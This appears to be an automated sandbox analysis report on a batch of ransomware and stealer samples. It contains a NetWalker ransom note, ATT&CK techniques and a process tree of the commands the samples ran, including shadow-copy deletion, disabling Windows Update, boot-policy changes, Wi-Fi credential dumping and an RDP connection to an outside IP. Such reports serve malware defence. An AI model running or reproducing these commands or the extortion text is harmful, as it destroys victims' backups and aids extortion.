QpWtMTpe2erYcsvxVSuOW/S1w9z0qW3VjQz3SEuLx8uLl2L3993ZtnEqlwSLVBgbZhUZ+SzeoprYOtW4v9Hz7MihkEufmFcCqA1MUVpuFWS8Umad+rC5XEh5+

Extracted

Path

C:\ProgramData\Package Cache\{d87ae0f4-64a6-4b94-859a-530b9c313c27}\A4AA9-Readme.txt

Family

netwalker

Ransom Note

Hi! Your files are encrypted. All encrypted files for this computer has extension: .a4aa9 -- If for some reason you read this text before the encryption ended, this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off, then we recommend that you move away from the computer and accept that you have been compromised, rebooting/shutdown will cause you to lose files without the possibility of recovery and even god will not be able to help you, it could be files on the network belonging to other users, sure you want to take that responsibility? -- Our encryption algorithms are very strong and your files are very well protected, you can't hope to recover them without our help. The only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypt program, you may damage them and then they will be impossible to recover. We advise you to contact us as soon as possible, otherwise there is a possibility that your files will never be returned. For us this is just business and to prove to you our seriousness, we will decrypt you some files for free, but we will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Contact us: [email protected] [email protected] Don't forget to include your code in the email: {code_345f15fb_a4aa9: I4JuTaxtbrWZ35JLcutmx7IzM38qnuoGajp271T064Wpnc0myQ wZueS++/KiOCJg1NOCnvrz6r4BZBQ8HG/judLp3d+umnYQ+xVf NMHV3ObB+2C9mNBt3zT/qoWGmXdPigh9GVXigasEsY6C006Hh6 7v3+OHkwqU4yaADrwYKhomdjUhdqAQ/g3EijPfy51sdYwGsBeh PeNBtUeYHWFO9+RyUA9DZwWEJnO6v5MQCXx57ix89Kg0bdP5vK 5I4TWOsDrcNztslcNHI9JwhCYU/B6Fo+c=}

Emails

[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Avaddon
Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.
ransomware avaddon
Avaddon family
avaddon

Detected Netwalker Ransomware 3 IoCs

Detected unpacked Netwalker executable.

resource	yara_rule
behavioral1/memory/2944-996-0x0000000000E20000-0x0000000000E3B000-memory.dmp	netwalker_ransomware
behavioral1/memory/3960-1388-0x00000000007C0000-0x00000000007DB000-memory.dmp	netwalker_ransomware
behavioral1/memory/3960-1389-0x00000000007C0000-0x00000000007DB000-memory.dmp	netwalker_ransomware

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Netwalker Ransomware
Ransomware family with multiple versions. Also known as MailTo.
ransomware netwalker
Netwalker family
netwalker

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral1/memory/3512-141-0x0000000000400000-0x0000000000450000-memory.dmp	family_agenttesla

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
4812	HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe
3600	HEUR-Trojan-Ransom.MSIL.Encoder.gen-325953506271955c3daa23c2de161f5a4128df3655609f48c77cc01cff405c9f.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
6244	cmd.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	api.myip.com
83	api.myip.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000023d3b-3398.dat	autoit_exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b99-111.dat	upx
behavioral1/memory/2256-112-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/memory/2256-148-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/memory/2256-286-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/memory/2256-962-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/memory/5336-3166-0x0000000000400000-0x0000000002258000-memory.dmp	upx
behavioral1/files/0x000400000001fcb0-9106.dat	upx

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
17192	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023c6f-140.dat	pyinstaller

Program crash 5 IoCs

pid	pid_target	Process	procid_target
5772	5336	WerFault.exe	144
6388	5336	WerFault.exe	144
1788	5336	WerFault.exe	144
8736	9424	WerFault.exe	197
10156	9424	WerFault.exe	197

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
6964	netsh.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Interacts with shadow copies 3 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
7868	vssadmin.exe
4520	vssadmin.exe
968	vssadmin.exe
5956	vssadmin.EXE

Kills process with taskkill 3 IoCs

evasion

pid	Process
7788	taskkill.exe
7196	taskkill.exe
7132	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
6328	regedit.exe
18272	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5404	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2432	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1192	7zFM.exe
1388	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeRestorePrivilege	1192	7zFM.exe
Token: 35	1192	7zFM.exe
Token: SeSecurityPrivilege	1192	7zFM.exe
Token: SeDebugPrivilege	2432	taskmgr.exe
Token: SeSystemProfilePrivilege	2432	taskmgr.exe
Token: SeCreateGlobalPrivilege	2432	taskmgr.exe
Token: SeDebugPrivilege	1388	taskmgr.exe
Token: SeSystemProfilePrivilege	1388	taskmgr.exe
Token: SeCreateGlobalPrivilege	1388	taskmgr.exe
Token: 33	2432	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2432	taskmgr.exe
Token: SeDebugPrivilege	736	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1192	7zFM.exe
1192	7zFM.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
2432	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe
1388	taskmgr.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 1388	2432	taskmgr.exe	97
PID 2432 wrote to memory of 1388	2432	taskmgr.exe	97
PID 736 wrote to memory of 4484	736	powershell.exe	103
PID 736 wrote to memory of 4484	736	powershell.exe	103
PID 4484 wrote to memory of 4812	4484	cmd.exe	104
PID 4484 wrote to memory of 4812	4484	cmd.exe	104
PID 4484 wrote to memory of 3600	4484	cmd.exe	105
PID 4484 wrote to memory of 3600	4484	cmd.exe	105
PID 4812 wrote to memory of 2520	4812	HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe	106
PID 4812 wrote to memory of 2520	4812	HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe	106
PID 4812 wrote to memory of 4044	4812	HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe	107
PID 4812 wrote to memory of 4044	4812	HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe	107

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00382.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1192

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:736
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-6112208ce621f62dc23cbe23ee9dc9fb1b19afeb04100ece403ad77e7808d2e8.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\explorer.exe
      "C:\Windows//explorer.exe"
      4⤵
      PID:2520
  - - C:\Windows\explorer.exe
      "C:\Windows//explorer.exe"
      4⤵
      PID:4044
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.MSIL.Encoder.gen-325953506271955c3daa23c2de161f5a4128df3655609f48c77cc01cff405c9f.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-325953506271955c3daa23c2de161f5a4128df3655609f48c77cc01cff405c9f.exe
    3⤵
    - Executes dropped EXE
    PID:3600
  - - C:\Users\Admin\AppData\Local\Temp\Flonwd.exe
      "C:\Users\Admin\AppData\Local\Temp\Flonwd.exe"
      4⤵
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\Flonwd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Flonwd.exe"
        5⤵
        
        PID:2732
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /create /tn updater47 /sc once /sd 01/01/1901 /tr "vssadmin Delete Shadows /All /Quiet" /st 00:00 /rl highest /ru SYSTEM /f"
        6⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn updater47 /sc once /sd 01/01/1901 /tr "vssadmin Delete Shadows /All /Quiet" /st 00:00 /rl highest /ru SYSTEM /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5404
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /run /i /tn updater47"
        6⤵
        
        PID:5536
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /i /tn updater47
        7⤵
        
        PID:5836
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /delete /tn updater47 /f"
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:6244
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn updater47 /f
        7⤵
        
        PID:4536
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Blocker.vho-443f2930646f2cb7118c8a9146a7bfb3ad16ed5c234bda832d479cbccb591aad.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-443f2930646f2cb7118c8a9146a7bfb3ad16ed5c234bda832d479cbccb591aad.exe
    3⤵
    PID:2256
  - - C:\Users\Admin\Desktop\00382\tpvpyme.exe
      "C:\Users\Admin\Desktop\00382\tpvpyme.exe"
      4⤵
      PID:4068
    - - C:\Windows\splwow64.exe
        
        C:\Windows\splwow64.exe 12288
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00382\USB_Habilitar.bat" "
        5⤵
        
        PID:8600
      - C:\Windows\SysWOW64\regedit.exe
        
        REGEDIT /S "C:\Users\Admin\Desktop\00382\USB_habilitar.reg
        6⤵
        Runs .reg file with regedit
        
        PID:6328
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00382\windowsUpdate.bat" "
        5⤵
        
        PID:8400
      - C:\Windows\SysWOW64\regedit.exe
        
        REGEDIT /S "C:\Users\Admin\Desktop\00382\windowsUpdate.reg
        6⤵
        Runs .reg file with regedit
        
        PID:18272
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        
        PID:8556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f
        5⤵
        
        PID:11924
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled
        5⤵
        
        PID:21124
      - C:\Windows\SysWOW64\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:17192
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net stop wuauserv
        5⤵
        
        PID:16560
      - C:\Windows\SysWOW64\net.exe
        
        net stop wuauserv
        6⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wuauserv
        7⤵
        
        PID:16696
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
        5⤵
        
        PID:12928
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
        6⤵
        
        PID:11688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
        5⤵
        
        PID:5204
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
        6⤵
        
        PID:11752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
        7⤵
        
        PID:13404
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Convagent.gen-493256859f821fdc95d26718e83555978d52873f520d0421d0c8e7748ae23c44.exe
    HEUR-Trojan-Ransom.Win32.Convagent.gen-493256859f821fdc95d26718e83555978d52873f520d0421d0c8e7748ae23c44.exe
    3⤵
    PID:4424
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3512
    - - C:\Windows\SysWOW64\netsh.exe
        
        "netsh" wlan show profile
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6964
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Encoder.gen-03a67850c7e515031147a1719e6b939101614c9cb8e18842b795622e6d6c416d.exe
    HEUR-Trojan-Ransom.Win32.Encoder.gen-03a67850c7e515031147a1719e6b939101614c9cb8e18842b795622e6d6c416d.exe
    3⤵
    PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\y_installer.exe
      C:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
      4⤵
      PID:1176
    - - C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"
        5⤵
        
        PID:5756
    - - C:\Users\Admin\AppData\Local\Temp\y_installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=10/ct=6/rt=0 --dh 2316 --st 1730672906
        5⤵
        
        PID:5796
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Generic-cd1b5ff1bafb617d314c182091ab7e20f076e0fed5ddf3318b58aa3f3b342c74.exe
    HEUR-Trojan-Ransom.Win32.Generic-cd1b5ff1bafb617d314c182091ab7e20f076e0fed5ddf3318b58aa3f3b342c74.exe
    3⤵
    PID:2672
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Mailto.vho-58e923ff158fb5aecd293b7a0e0d305296110b83c6e270786edcc4fea1c8404c.exe
    HEUR-Trojan-Ransom.Win32.Mailto.vho-58e923ff158fb5aecd293b7a0e0d305296110b83c6e270786edcc4fea1c8404c.exe
    3⤵
    PID:3388
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\system32\explorer.exe"
      4⤵
      PID:3960
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe"
        5⤵
        
        PID:2944
      - C:\Windows\system32\vssadmin.exe
        
        C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:968
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-b2ea8019d211c295d9406b52d4c06012b748d428beb20f76ea0c39e3321023cd.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-b2ea8019d211c295d9406b52d4c06012b748d428beb20f76ea0c39e3321023cd.exe
    3⤵
    PID:4176
- - C:\Users\Admin\Desktop\00382\HEUR-Trojan-Ransom.Win32.Rack.vho-b0a0cf95d5d41c25dfe41717187a4acc5996f55b4a637586f08868f00d6d9982.exe
    HEUR-Trojan-Ransom.Win32.Rack.vho-b0a0cf95d5d41c25dfe41717187a4acc5996f55b4a637586f08868f00d6d9982.exe
    3⤵
    PID:2140
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
      4⤵
      PID:5428
    - - C:\Windows\SysWOW64\wscript.exe
        
        WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
        5⤵
        
        PID:7412
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
      4⤵
      PID:6312
    - - C:\Windows\SysWOW64\wscript.exe
        
        WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
        5⤵
        
        PID:8152
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
      4⤵
      PID:7288
    - - C:\Windows\SysWOW64\wscript.exe
        
        WScript "C:\ProgramData\vevwmEZEmt\r.vbs"
        5⤵
        
        PID:3608
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.AutoIt.xqq-10ed64783e51c15406b77a766f721e910d292c08af749e5685497d8e9ffeb0ee.exe
    Trojan-Ransom.Win32.AutoIt.xqq-10ed64783e51c15406b77a766f721e910d292c08af749e5685497d8e9ffeb0ee.exe
    3⤵
    PID:4012
  - - C:\Users\Admin\RDP6\ConnectionClient.exe
      "C:\Users\Admin\RDP6\ConnectionClient.exe" -server 187.45.118.83 -psw cc1305gs1 -color 24 -alttab 0 -remoteapp off -seamless off -width 1024 -height 768 -printer on -com off -smartcard off -preview on -disk on -smartsizing 0 -localtb 32
      4⤵
      PID:6304
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Avaddon.a-05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2.exe
    Trojan-Ransom.Win32.Avaddon.a-05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2.exe
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:4212
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:5460
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:5816
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Blocker.mfam-a1e0799365123c203abda5e44e6687d14f7bee6aac13495442ac0ef72f9fc99b.exe
    Trojan-Ransom.Win32.Blocker.mfam-a1e0799365123c203abda5e44e6687d14f7bee6aac13495442ac0ef72f9fc99b.exe
    3⤵
    PID:2804
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Blocker.mnth-86b2e82e316f3be574f0163da7ffe2eb35cda9cbb781e34d6ffbf6b4a8841cf2.exe
    Trojan-Ransom.Win32.Blocker.mnth-86b2e82e316f3be574f0163da7ffe2eb35cda9cbb781e34d6ffbf6b4a8841cf2.exe
    3⤵
    PID:300
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Blocker.moeb-77a175b5303c12af711a5da686cac1fa0767e65795bc9b221a371a802d9d1c30.exe
    Trojan-Ransom.Win32.Blocker.moeb-77a175b5303c12af711a5da686cac1fa0767e65795bc9b221a371a802d9d1c30.exe
    3⤵
    PID:5336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 640
      4⤵
      Program crash
      PID:5772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 748
      4⤵
      Program crash
      PID:6388
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 792
      4⤵
      Program crash
      PID:1788
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Blocker.mogu-25a3cd8ab210bb51a2c3f51c1c5493fd49692a9a609f1d0cc7ab0bb5584b7027.exe
